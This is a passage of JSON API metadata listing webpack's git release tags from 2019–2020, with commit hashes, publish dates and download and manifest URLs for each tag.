0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f